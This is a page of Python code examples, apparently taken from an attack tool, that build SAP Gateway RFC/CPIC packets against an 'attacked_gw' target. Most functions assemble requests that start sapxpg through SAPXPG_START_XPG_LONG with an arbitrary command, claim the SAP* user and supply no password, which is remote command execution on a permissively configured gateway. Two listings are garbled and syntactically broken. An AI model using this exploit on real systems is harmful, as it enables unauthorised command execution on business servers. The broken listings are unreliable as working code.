Пример #1
    def do_connect(self, args):
        """Open a socket to the Gateway service and send it a check packet.

        Host, port and route string are read from ``self.options`` and the
        RFC version from ``self.runtimeoptions["version"]``. On success the
        socket is kept in ``self.connection`` and ``self.connected`` is set
        to True. *args* is not used.
        """
        opts = self.options

        # Step 1: obtain the NI socket; a socket error aborts the command.
        try:
            self.connection = SAPRoutedStreamSocket.get_nisocket(
                opts.remote_host,
                opts.remote_port,
                opts.route_string,
                base_cls=SAPRFC,
            )
        except SocketError as err:
            self._error("Error connecting with the Gateway service")
            self._error(str(err))
            return

        self._print("Attached to %s / %d" % (opts.remote_host, opts.remote_port))

        # Step 2: send a req_type=1 packet built with the configured version.
        check_pkt = SAPRFC(version=int(self.runtimeoptions["version"]), req_type=1)

        self._debug("Sending check gateway packet")
        try:
            self.connection.send(check_pkt)
        except SocketError:
            self._error("Error connecting to the gateway monitor service")
            return

        # NOTE: the reply is never inspected here; a send that does not raise
        # is what marks the session as connected.
        self.connected = True
Пример #2
    def do_noop(self, args):
        """Send a noop packet (req_type=9, cmd=1) over the open connection.

        Reports an error and does nothing else when ``self.connected`` is
        false. *args* is not used and the reply to the packet is discarded.
        """
        if self.connected:
            noop_pkt = SAPRFC(
                version=int(self.runtimeoptions["version"]),
                req_type=9,
                cmd=1,
            )
            self._debug("Sending noop packet")
            self.connection.send(noop_pkt)
        else:
            self._error("You need to connect to the server first !")
Пример #3
def build_p2():
	"""Build the version-6 ``F_SAP_INIT`` / ``CPIC`` packet that names ``sapxpg``.

	Three objects are assembled and the outer one is returned: a
	``SAPRFCDTStruct`` (``long_tp='sapxpg'``, addresses read from the
	module-level ``attacked_gw`` dict), a ``SAPRFCEXTEND`` header
	(``ctypes='STARTED_PRG'``, ``ncpic_tp='sapxpg'``) and the ``SAPRFC``
	packet that carries both. Nothing is sent from here.

	NOTE(review): as extracted, this listing is not valid Python (several
	keyword arguments are not separated from the next one), so it is
	documented as found rather than rewritten.

	NOTE(review): defensive context -- whether a gateway accepts a remote
	request to start ``sapxpg`` is governed by its secinfo ACL
	(``gw/sec_info``, ``gw/acl_mode``); presumably this packet only matters
	against a permissive ACL. Confirm against the configuration of the
	system under test.
	"""
	# Data structure: identifiers and timeouts are literals; the address
	# fields come from attacked_gw['ip'], which is not defined in this function.
	dt_structure = SAPRFCDTStruct(version=96,
								  padd1='\x00\x00\x00\x00\x00\x00\x00\x00',
								  root_id = '\x0E\x02\x00\x00\x00\x00\xE8\x4D\x23\x00\xDF\x07\x00\x00\x01\x00',
								  conn_id = '\x4E\xD5\x81\xE3\x09\xF6\xF1\x18\xA0\x0A\x00\x0C\x29\x00\x99\xD0',
								  conn_id_suff=0,
								  timeout =-1,
								  keepalive_timeout=-1,
								  export_trace=2,
								  start_type='DEFAULT',
								  net_protocol=10,
								  local_addrv6='::{}'.format(attacked_gw['ip'])
								  long_lu = attacked_gw['ip'],
								  padd3 = '\x00' * 16,
								  user= '******',  # NOTE(review): value looks masked in this listing
								  padd4 = '\x20' * 8,
								  padd5 = '\x00' * 4,
								  padd6 = '\x20' * 12,
								  padd7 = '\x00' * 16,
								  addr_ipv4=attacked_gw['ip'],
								  padd8 = '\x00' * 4,
								  long_tp = 'sapxpg',
								  )

	# Extended header: destination name from attacked_gw, program type STARTED_PRG.
	ext_inf = SAPRFCEXTEND(short_dest_name=attacked_gw['dest_name'],
	ncpic_lu='196.168.50.46'  # NOTE(review): literal address, not read from attacked_gw
	ncpic_tp='sapxpg'
	ctypes='STARTED_PRG',
	clientInfo=1,
	ncpic_parameters_padd='\x00\x00',
	comm_idx=0,
	conn_idx=65535,
	)
	# Outer packet; MODE/UID are upper-case here, unlike the lower-case
	# mode/uid used by the other builders on this page.
	p2 = SAPRFC(version=6,func_type='F_SAP_INIT',
		protocol = 'CPIC',
		MODE=0,
		UID=19,
		gw_id=65535,
		err_len=0,
		info2='WITH_LONG_LU_NAME',
		trace_level=0,
		time=0
		info='GW_EXTENDED_INIT_OPTIONS+GW_DIST_TRACE',
		padd_appc=0,
		vector=0,
		appc_rc='CM_OK',
		sap_rc=0,
		sap_ext_header =ext_inf,
		sap_param=dt_structure

		)
	#p2.show2()
	return p2
Пример #4
def build_p1(ip, inbr):
    """Build the opening gateway request for instance number *inbr*.

    Returns a version-2 ``SAPRFC`` packet of request type
    ``GW_NORMAL_CLIENT`` whose ``address`` is *ip* and whose ``service`` and
    ``tp`` fields are both ``sapgw<inbr>``. Nothing is sent here.
    """
    # service and tp carry the same "sapgw<inbr>" name, so format it once.
    gateway_name = 'sapgw{}'.format(inbr)
    fields = dict(
        version=2,
        req_type='GW_NORMAL_CLIENT',
        address=ip,
        service=gateway_name,
        codepage=4103,
        lu='sapserve',
        tp=gateway_name,
        conversation_id=' ' * 8,
        appc_header_version=6,
        accept_info='EINFO+PING+CONN_EINFO',
        idx=-1,
    )
    return SAPRFC(**fields)
Пример #5
def build_p3(conv_id):
	"""Build an ``F_SAP_SEND`` / ``CPIC`` packet for conversation *conv_id*.

	NOTE(review): this listing is corrupted as extracted (the source itself
	is marked ``#corrupted``): string literals are left unterminated,
	keyword arguments are repeated, and ``cpic_params`` is referenced
	although only ``cpic_params2`` is assigned in the function. It is not
	valid Python and is documented as found, not repaired.

	What is visible: the function reads the module-level names
	``attacked_gw``, ``cmd`` and ``cmd_lparams``; the ``SAPRFXPG`` block
	places ``cmd`` / ``cmd_lparams`` in the EXTPROG / LONG_PARAMS values;
	the ``SAPRFCTHStruct`` states user ``SAP*`` and action ``SM49``. No
	password or ticket field is set anywhere in the block, so presumably
	the gateway-side ACL is the only access control in play -- confirm.
	"""

	# Suffix block: alternating 3-byte markers and values. The client
	# description strings are constants; only suff_kernel is read from attacked_gw.
	cpic_suf = SAPCPICSUFFIX(
		suff_padd1='\x10\x04\x02',
		suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8',
		suff_padd2='\x10\x04\x0b',
		suff_unk2='\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00',
		suff_padd3='\x10\x04\x04',
		suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07',
		suff_padd4='\x10\x04\x0d',
		suff_unk4='\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c',
		suff_padd5='\x10\x04\x16',
		suff_unk5='\x00\x11',
		suff_padd6='\x10\x04\x17',
		suff_unk6='\x00\x22',
		suff_padd7='\x10\x04\x19',
		suff_unk7='\x00\x00',	
		suff_padd8='\x10\x04\x1e',
		suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58',
		suff_padd9='\x10\x04\x25',
		suff_unk9='\x00\x01',
		suff_padd10k='\x10\x04\x09',
		suff_kernel=attacked_gw['Kernel'],
		suff_padd10='\x10\x04\x1d',
		suff_unk10='\x30',
		suff_padd11='\x10\x04\x1f',
		suff_cli1='Windows 7 Professional 6.1 (7601) Servic',
		suff_padd12='\x10\x04\x20',
		suff_cli2='IE 9.10.9200.16618',
		suff_padd13='\x10\x04\x21',
		suff_cli3='Office 12',
		suff_padd14='\x10\x04\x24',
		suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80',
		suff_padd15='\x10\x04\x13',
		suff_unk15='\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00',
	)
	
	# XPG parameter table: label/value pairs. The EXTPROG and LONG_PARAMS
	# values are the module-level cmd / cmd_lparams, space-padded on the right.
	xpg = SAPRFXPG(
		xpg_padd100='\x05\x12\x02\x05',
		xpg_convid_1='CONVID',
		xpg_padd101='\x02\x05\x02\x05',
		xpg_strstat_l='STRTSTAT',
		xpg=padd102='\x02\x05\x02\x05',
		xpg_xpgid_l='XPGID',
		xpg_padd103='\x02\x05\x02\x01',
		xpg_extprog_l='EXTPROG',
		xpg_padd104='\x02\x01\x02\x03',
		xpg_extprog_val='{: <128}'.format(cmd),
		xpg_padd105='\x02\x03\x02\x01',
		xpg_longparam_l='LONG_PARAMS',
		xpg_padd106='\x02\x01\x02\x03',
		xpg_longparam_val='{: <1024}'.format(cmd_lparams),
		xpg_padd107='\x02\x03\x02\x01',
		xpg_param_1='PARAMS',
		xpg_padd108='\x02\x01\x02\x03',
		xpg_stderrcntl_1='STDERRCNTL',
		xpg_padd110='\x02\x01\x02\x03',
		xpg_stderrcntl_val='M',
		xpg_padd111='\x02\x03\x02\x01',
		xpg_stdinctl_1='STDINCNTL',
		xpg_padd112='\x02\x01\x02\x03',
		xpg_stdinctl_val='M',
		xpg_padd113='\x02\x03\x02\x01',
		xpg_stdoutcntl_l='STDOUTCNTL',
		xpg_padd114='\x02\x01\x02\x03',
		xpg_stdountcntl_val='M',
		xpg_padd115='\x02\x03\x02\x01',
		xpg_termcntl_1='TERMCNTL',
		xpg_padd116='\x02\x01\x02\x03',
		xpg_termcntl_val='C',
		xpg_padd117='\x02\x03\x02\x01',
		xpg_trcaecntl='TRACECNTL',
		xpg_padd118='\x02\x01\x02\x03',
		xpg_tacecntl_val='6',
		xpg_padd119='\x02\x03\x03\x01',
		xpg_log_l='LOG',
		xpg_padd120='\x03\x01\x03\x30',
		xpg_log_val1='\x00\x00\x00\x01',
		xpg_padd121='\x03\x30\x03\x02',
		xpg_unk1='\x00\x00\x00\x80\x00\x00\x00\x00',
	)

	# First assignment of cpic_params2; it is replaced by the second
	# assignment just below before anything reads it.
	cpic_params2 = SAPCPICPARAM2(# the original author did not know why these values are needed
		param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1',
		param2 = '\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5',
		param_sess_1 = '\x81\xe3',#session, 1st part
		param_sess_2 = '\x09\xf6\xf1\x18',#session, 2nd part
		mask='225.0.0.0',
		ip= attacked_gw['ip'], #Extremely critical and dangerous (author's remark)
		flag=1,
	)	

	cpic_params2=SAPCPICPARAM2(#the original author did not know why these values are needed
		param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1', #session
		mask='160.10.0.12',
		ip = '41.0.153.208', #Dangerous and critical (author's remark)
	)

	# TH struct: system ids are formatted from attacked_gw; user and action
	# are the literals 'SAP*' and 'SM49'.
	th = SAPRFCTHStruct(
		th_eyecl="*TH*",
		th_version=3,
		th_len=230,
		th_trace_flag=0,
		th_sysid='{}/{}_{}_{}'.format(attacked_gw["sid"],attcked_gw[hostname],attacked_gw['sid'],attacked_gw['instance']),
		th_service=1,
		th_service=1,
		th_userid='SAP*',
		th_action='SM49',
		th_acttype=1,
		th_pressysid='{}/{}_{}_{}'.format(attacked_gw["sid"],attacked_gw['hostname'],attacked_gw['sid'],attacked_gw['instance']),
		th_id='37D581E3889AF16DA00A000C290099D0001',
		th_some_cpic_params=cpic_params,
		th_eyec2="*TH*",

	)

	# NOTE(review): the SAPCPIC call below is where the listing breaks off;
	# it never uses th, xpg or cpic_suf built above.
	cpic = SAPCPIC(
		cpic_start_padd='\x01\x01\x00\x08',
		cpic_cpic_leng=257,

		cpic_padd003="\x01\x01\x01\x01",
		cpic_unk02="",

		cpic_padd0002='\x01\x01\x01\x03',
		cpic_unk01="\x00\x00\x06\x1b",

		cpic_padd0001="\x01\x03\x01\x06	cpic_

		cpic_padd002="\x01\x01\x01\x03",
		cpic_unk02="\x00\x00\x06\x1b",

		cpic_padd001="\x01\x03\x01\x06",
		cpic_unk00="\x04\x01\x00\x03\x01\x03\x02\x00\x00\x00\x23",

		cpic_padd001="\x01\x06\x00\x07",
	
	cpic_ip='un

	#corrupted
	)

	# Outer packet: wraps cpic for conversation conv_id and is returned unsent.
	p3 = SAPRFC(version=6,
		func_type='F_SAP_SEND',
		protocol='CPIC',
		mode=0,
		uid=19,
		gw_id=1,
		err_len=0,
		info3=0,
		timeout=500,#timeout in milliseconds
		info4=0,
		seq_no=0,
		sap_param_len=8,
		padd_appc=0,
		info = 'SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM',
		vector='F_V_SEND_DATA+F_V_RECEIVE',
		appc_rc='CM_OK',
		sap_rc=0,
		conv_id=conv_id,
		cm_ok_padd='\x00'*31 + '\x02',
		sap_cpic=cpic,
		cpic_packet_size=len(cpic),
		rfc_packet_size=28000,
	)

	#p3.show2()
	return p3
Пример #6
def buld_p4(conv_id):
    """Build the ``F_SAP_SEND`` / ``CPIC`` packet that calls ``SAPXPG_END_XPG``.

    Assembles ``SAPCPICPARAM``, ``SAPCPICPARAM2``, ``SAPRFXPG_END`` and
    ``SAPCPICSUFFIX`` parts into a ``SAPCPIC2`` body, wraps it in a version-6
    ``SAPRFC`` packet for conversation *conv_id* and returns it without
    sending anything. The only external value read is
    ``attacked_gw['kernel']`` (module level, not defined in this function);
    every address, mask and byte string below is a literal.
    """

    # Parameter block with literal mask/ip values and flag=2.
    cpic_params = SAPCPICPARAM(
        param1='\x00\x99\xd0\x1e',
        param2='\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5',
        param_sess_1='\x81\xe3',  # session 1st part?
        param_sess_2='\x09\xf6\xf1\x18',  # session 2nd part?
        mask='160.10.0.12',
        ip='41.0.153.208',
        flag=2,
    )

    cpic_params2 = SAPCPICPARAM2(  #the original author did not know why these values are needed
        param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1',
        mask='160.10.0.12',
        ip='41.0.153.208',
    )

    # Table of labels (EXITCODE, STRTSTAT, LOG) separated by 4-byte markers.
    sap_xpg_end = SAPRFXPG_END(
        xpg_end_padd001='\x05\x12\x02\x05',
        xpg_end_ecode_l='EXITCODE',
        xpg_end_padd002='\x02\x05\x02\x05',
        xpg_end_estat_l='STRTSTAT',
        xpg_end_padd003='\x02\x05\x03\x01',
        xpg_end_log_l='LOG',
        xpg_end_padd004='\x03\x01\x03\x30',
        xpg_end_unk1='\x00\x00\x00\x01',
        xpg_end_padd005='\x03\x30\x03\x02',
        xpg_end_unk2='\x00\x00\x00\x80\x00\x00\x00\x00',
    )

    # Suffix block: the client description strings are constants, so every
    # packet built here carries the same text; only suff_kernel varies.
    cpic_suf = SAPCPICSUFFIX(
        suff_padd1='\x10\x04\x02',
        suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8',
        suff_padd2='\x10\x04\x0b',
        suff_unk2=
        '\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00',
        suff_padd3='\x10\x04\x04',
        suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07',
        suff_padd4='\x10\x04\x0d',
        suff_unk4=
        '\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c',
        suff_padd5='\x10\x04\x16',
        suff_unk5='\x00\x11',
        suff_padd6='\x10\x04\x17',
        suff_unk6='\x00\x22',
        suff_padd7='\x10\x04\x19',
        suff_unk7='\x00\x00',
        suff_padd8='\x10\x04\x1e',
        suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58',
        suff_padd9='\x10\x04\x25',
        suff_unk9='\x00\x01',
        suff_padd10k='\x10\x04\x09',
        suff_kernel=attacked_gw['kernel'],
        suff_padd10='\x10\x04\x1d',
        suff_unk10='\x30',
        suff_padd11='\x10\x04\x1f',
        suff_cli1='Windows 7 Professional 6.1 (7601) Servic',
        suff_padd12='\x10\x04\x20',
        suff_cli2='IE 9.10.9200.16618',
        suff_padd13='\x10\x04\x21',
        suff_cli3='Office 12',
        suff_padd14='\x10\x04\x24',
        suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80',
        suff_padd15='\x10\x04\x13',
        suff_unk15=
        '\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00',
    )

    # CPIC body: names the RFC function SAPXPG_END_XPG and embeds the parts
    # built above.
    cpic2 = SAPCPIC2(
        cpic_padd015_1='\x01\x36',
        some_cpic_params=cpic_params,
        cpic_padd016='\x01\x36\x05\x02',
        cpic_convid_label='',
        cpic_padd017='\x05\x02\x00\x0b',
        cpic_kernel3=attacked_gw['kernel'],
        cpic_padd018='\x00\x0b\x01\x02',
        cpic_RFC_f='SAPXPG_END_XPG',
        cpic_padd019='\x01\x02\x05\x03',
        cpic_unk4='',
        cpic_padd021='\x05\x03\x05\x14',
        some_cpic_params2=cpic_params2,
        cpic_padd022='\x05\x14\x04\x20',
        cpic_unk6='\x00\x00\x00\x00',
        cpic_padd023='\x04\x20\x05\x12',
        cpic_unk7='',
        xpg_end=sap_xpg_end,
        cpic_padd024='\x03\x02\x01\x04',
        cpic_suff=cpic_suf,
        cpic_end_padd='\x01\x04\xff\xff',
        cpic_end='',
        cpic_end_sig='\xff\xff\x00\x00',
    )

    # Outer packet. cpic_packet_size is len(cpic2) -- presumably the
    # serialized length of the body; confirm against the SAPCPIC2 definition.
    p4 = SAPRFC(
        version=6,
        func_type='F_SAP_SEND',
        protocol='CPIC',
        mode=0,
        uid=19,
        gw_id=1,
        err_len=0,
        info2=0,
        trace_level=0,
        time=0,
        info3=0,
        timeout=500,
        info4=0,
        seq_no=0,
        sap_param_len=8,
        padd_appc=0,
        info=
        'SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM',
        vector='F_V_SEND_DATA+F_V_RECEIVE',
        appc_rc='CM_OK',
        sap_rc=0,
        conv_id=conv_id,
        cm_ok_padd='\x00' * 31 + '\x02',
        sap_cpic_cut=cpic2,
        cpic_packet_size=len(cpic2),
        rfc_packet_size=28000,
    )
    #p4.show2()
    return p4
Пример #7
def buld_p3(conv_id):
    """Build the ``F_SAP_SEND`` / ``CPIC`` packet that calls ``SAPXPG_START_XPG_LONG``.

    Reads the module-level names ``attacked_gw`` (keys ``ip``, ``hostname``,
    ``sid``, ``instance``, ``kernel``, ``dest_name``, ``cli_nbr``), ``cmd``,
    ``cmd_lparams`` and ``cmd_params``; none of them is defined in this
    function, so they must exist before it is called. *conv_id* is copied
    into the outer packet. The packet is returned, not sent.

    Security-relevant content visible below:

    * the ``SAPRFXPG`` table carries ``cmd`` / ``cmd_lparams`` /
      ``cmd_params`` as the EXTPROG, LONG_PARAMS and PARAMS values,
      left-aligned and space-padded to a minimum width of 128, 1024 and 255
      characters (longer values are not truncated by the format spec);
    * user ``SAP*`` is written into the TH struct and both CPIC username
      fields, and no password or ticket field is set anywhere in the block;
    * the client description strings, ``th_id`` and the ``suff_unk*`` blobs
      are constants, so every packet built here carries the same bytes.

    NOTE(review): the request is presumably only honoured by a gateway whose
    secinfo ACL lets this client start the external program -- check
    ``gw/sec_info`` and ``gw/acl_mode`` on the system under test. The
    constant strings above may be usable as traffic indicators; confirm
    against a capture.
    """

    # Suffix block: alternating 3-byte markers and values; only suff_kernel
    # is read from attacked_gw.
    cpic_suf = SAPCPICSUFFIX(
        suff_padd1='\x10\x04\x02',
        suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8',
        suff_padd2='\x10\x04\x0b',
        suff_unk2=
        '\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00',
        suff_padd3='\x10\x04\x04',
        suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07',
        suff_padd4='\x10\x04\x0d',
        suff_unk4=
        '\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c',
        suff_padd5='\x10\x04\x16',
        suff_unk5='\x00\x11',
        suff_padd6='\x10\x04\x17',
        suff_unk6='\x00\x22',
        suff_padd7='\x10\x04\x19',
        suff_unk7='\x00\x00',
        suff_padd8='\x10\x04\x1e',
        suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58',
        suff_padd9='\x10\x04\x25',
        suff_unk9='\x00\x01',
        suff_padd10k='\x10\x04\x09',
        suff_kernel=attacked_gw['kernel'],
        suff_padd10='\x10\x04\x1d',
        suff_unk10='\x30',
        suff_padd11='\x10\x04\x1f',
        suff_cli1='Windows 7 Professional 6.1 (7601) Servic',
        suff_padd12='\x10\x04\x20',
        suff_cli2='IE 9.10.9200.16618',
        suff_padd13='\x10\x04\x21',
        suff_cli3='Office 12',
        suff_padd14='\x10\x04\x24',
        suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80',
        suff_padd15='\x10\x04\x13',
        suff_unk15=
        '\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00',
    )

    # XPG parameter table: label/value pairs separated by 4-byte markers.
    # The three *_val fields built with str.format take their content from
    # module-level variables, i.e. from whoever configures the script.
    xpg = SAPRFXPG(
        xpg_padd100='\x05\x12\x02\x05',
        xpg_convid_l='CONVID',
        xpg_padd101='\x02\x05\x02\x05',
        xpg_strstat_l='STRTSTAT',
        xpg_padd102='\x02\x05\x02\x05',
        xpg_xpgid_l='XPGID',
        xpg_padd103='\x02\x05\x02\x01',
        xpg_extprog_l='EXTPROG',
        xpg_padd104='\x02\x01\x02\x03',
        xpg_extprog_val='{: <128}'.format(cmd),
        xpg_padd105='\x02\x03\x02\x01',
        xpg_longparam_l='LONG_PARAMS',
        xpg_padd106='\x02\x01\x02\x03',
        xpg_longparam_val='{: <1024}'.format(cmd_lparams),
        xpg_padd107='\x02\x03\x02\x01',
        xpg_param_l='PARAMS',
        xpg_padd108='\x02\x01\x02\x03',
        xpg_param_val='{: <255}'.format(cmd_params),
        xpg_padd109='\x02\x03\x02\x01',
        xpg_stderrcntl_l='STDERRCNTL',
        xpg_padd110='\x02\x01\x02\x03',
        xpg_stderrcntl_val='M',
        xpg_padd111='\x02\x03\x02\x01',
        xpg_stdincntl_l='STDINCNTL',
        xpg_padd112='\x02\x01\x02\x03',
        xpg_stdincntl_val='R',
        xpg_padd113='\x02\x03\x02\x01',
        xpg_stdoutcntl_l='STDOUTCNTL',
        xpg_padd114='\x02\x01\x02\x03',
        xpg_stdoutcntl_val='M',
        xpg_padd115='\x02\x03\x02\x01',
        xpg_termcntl_l='TERMCNTL',
        xpg_padd116='\x02\x01\x02\x03',
        xpg_termcntl_val='C',
        xpg_padd117='\x02\x03\x02\x01',
        xpg_tracecntl_l='TRACECNTL',
        xpg_padd118='\x02\x01\x02\x03',
        xpg_tracecntl_val='6',
        xpg_padd119='\x02\x03\x03\x01',
        xpg_log_l='LOG',
        xpg_padd120='\x03\x01\x03\x30',
        xpg_log_val1='\x00\x00\x00\x01',
        xpg_padd121='\x03\x30\x03\x02',
        xpg_unk1='\x00\x00\x00\x80\x00\x00\x00\x00',
    )

    # Parameter block whose ip field is attacked_gw['ip'], with flag=1.
    cpic_params = SAPCPICPARAM(
        param1='\x00\x99\xd0\x1e',
        param2='\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5',
        param_sess_1='\x81\xe3',  # session 1st part?
        param_sess_2='\x09\xf6\xf1\x18',  # session 2nd part?
        mask='225.0.0.0',
        ip=attacked_gw['ip'],
        flag=1,
    )

    cpic_params2 = SAPCPICPARAM2(  #the original author did not know why these values are needed
        param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1',
        mask='160.10.0.12',
        ip='41.0.153.208',
    )

    # TH struct: both system ids are "<sid>/<hostname>_<sid>_<instance>"
    # built from attacked_gw; user and action are the literals 'SAP*' / 'SM49'.
    th = SAPRFCTHStruct(
        th_eyec1="*TH*",
        th_version=3,
        th_len=230,
        th_trace_flag=0,
        th_sysid='{}/{}_{}_{}'.format(attacked_gw["sid"],
                                      attacked_gw['hostname'],
                                      attacked_gw['sid'],
                                      attacked_gw['instance']),
        th_serevice=1,
        th_userid='SAP*',
        th_action='SM49',
        th_acttype=1,
        th_presysid='{}/{}_{}_{}'.format(attacked_gw["sid"],
                                         attacked_gw['hostname'],
                                         attacked_gw['sid'],
                                         attacked_gw['instance']),
        th_id='37D581E3889AF16DA00A000C290099D0001',
        th_some_cpic_params=cpic_params,
        th_eyec2="*TH*",
    )

    # CPIC body: target identity (ip, host_sid_instance, kernel, destination,
    # client number) comes from attacked_gw; the program, username and RFC
    # function name are literals.
    cpic = SAPCPIC(
        cpic_start_padd='\x01\x01\x00\x08',
        cpic_cpic_length=257,
        cpic_padd0003="\x01\x01\x01\x01",
        cpic_unk02="",
        cpic_padd0002="\x01\x01\x01\x03",
        cpic_unk01="\x00\x00\x06\x1b",
        cpic_padd0001="\x01\x03\x01\x06",
        cpic_unk00="\x04\x01\x00\x03\x01\x03\x02\x00\x00\x00\x23",
        cpic_padd001="\x01\x06\x00\x07",
        cpic_ip='{: <15}'.format(attacked_gw['ip']),
        cpic_padd002='\x00\x07\x00\x18',
        cpic_ip2=attacked_gw['ip'],
        cpic_padd003='\x00\x18\x00\x08',
        cpic_host_sid_inbr='{}_{}_{}'.format(attacked_gw['hostname'],
                                             attacked_gw['sid'],
                                             attacked_gw['instance']),
        cpic_padd004='\x00\x08\x00\x11',
        cpic_rfc_type='3',
        cpic_padd005='\x00\x11\x00\x13',
        cpic_kernel1='{} '.format(attacked_gw['kernel']),
        cpic_padd006='\x00\x13\x00\x12',
        cpic_kernel2='{} '.format(attacked_gw['kernel']),
        cpic_padd007='\x00\x12\x00\x06',
        cpic_dest=attacked_gw['dest_name'],
        cpic_padd008='\x00\x06\x01\x30',
        cpic_program='SAPLSSXP',
        cpic_padd009='\x01\x30\x01\x11',
        cpic_username1='SAP*',
        cpic_padd010='\x01\x11\x01\x14',
        cpic_cli_nbr1=attacked_gw['cli_nbr'],
        cpic_padd011='\x01\x14\x01\x15',
        cpic_unk1='E',
        cpic_padd012='\x01\x15\x00\x09',
        cpic_username2='SAP*',
        cpic_padd013='\x00\x09\x01\x34',
        cpic_cli_nbr2=attacked_gw['cli_nbr'],
        cpic_padd014='\x01\x34\x05\x01',
        cpic_unk2='\x01',
        cpic_padd015_0='\x05\x01',  # marker split across two fields (_0 / _1)
        cpic_padd015_1='\x01\x36',  # second half of the split marker
        some_cpic_params=cpic_params,
        cpic_padd016='\x01\x36\x05\x02',
        cpic_convid_label='',
        cpic_padd017='\x05\x02\x00\x0b',
        cpic_kernel3=attacked_gw['kernel'],
        cpic_padd018='\x00\x0b\x01\x02',
        cpic_RFC_f='SAPXPG_START_XPG_LONG',
        cpic_padd019='\x01\x02\x05\x03',
        cpic_unk4='',
        cpic_padd020='\x05\x03\x01\x31',
        cpic_th_struct=th,
        cpic_padd021='\x01\x31\x05\x14',
        some_cpic_params2=cpic_params2,
        cpic_padd022='\x05\x14\x04\x20',
        cpic_unk6='\x00\x00\x00\x00',
        cpic_padd023='\x04\x20\x05\x12',
        cpic_unk7='',
        xpg_p=xpg,
        cpic_padd024='\x03\x02\x01\x04',
        cpic_suff=cpic_suf,
        cpic_end_padd='\x01\x04\xff\xff',
        cpic_end='',
        cpic_end_sig='\xff\xff\x00\x00',
    )

    # Outer packet. cpic_packet_size is len(cpic) -- presumably the
    # serialized length of the body; confirm against the SAPCPIC definition.
    p3 = SAPRFC(
        version=6,
        func_type='F_SAP_SEND',
        protocol='CPIC',
        mode=0,
        uid=19,
        gw_id=1,
        err_len=0,
        info2=0,
        trace_level=0,
        time=0,
        info3=0,
        timeout=500,
        info4=0,
        seq_no=0,
        sap_param_len=8,
        padd_appc=0,
        info=
        'SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM',
        vector='F_V_SEND_DATA+F_V_RECEIVE',
        appc_rc='CM_OK',
        sap_rc=0,
        conv_id=conv_id,
        cm_ok_padd='\x00' * 31 + '\x02',
        sap_cpic=cpic,
        cpic_packet_size=len(cpic),
        rfc_packet_size=28000,
    )

    #p3.show2()
    return p3